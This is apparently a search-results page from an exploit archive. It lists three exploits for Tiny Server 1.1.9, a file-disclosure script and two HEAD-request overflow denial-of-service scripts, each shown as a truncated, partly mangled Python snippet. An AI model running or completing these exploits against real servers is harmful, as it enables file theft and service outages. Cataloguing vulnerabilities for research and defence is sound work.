3 matches found
Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit
Usage Info python exploit.py http://127.0.0.1:80 flag.txt -- coding: utf-8 -- import urllib2 import sys Tiny Server v1.1.9 Arbitrary File Disclosure Exploit def banner: print "\0331m\03392mTiny Server v1.1.9 Arbitrary File Disclosure Exploit" print "Exploit Write by Yahya Tanisik" print "Contact ...
Tiny Server 1.1.9 - HEAD Denial of Service
Tiny Server 1.1.9 - HEAD Denial of Service !/usr/bin/python Overflow exploiting a vulnerability in Tiny Server ' sys.exit host = sys.argv1 port = sys.argv2 buffer = 'A' 100 + 'HTTP/1.0\r\n' print '\n' print ' Tiny Server = 1.1.0HTTP HEAD request overflow' print ' Written by Brock Haun' print '...
Tiny Server 1.1.9 Denial Of Service
!/usr/bin/python Overflow exploiting a vulnerability in Tiny Server ' sys.exit host = sys.argv1 port = sys.argv2 buffer = 'A' 100 + 'HTTP/1.0\r\n' print '\n' print ' Tiny Server = 1.1.0HTTP HEAD request overflow' print ' Written by Brock Haun' print ' [email protected]' print '\n' try:...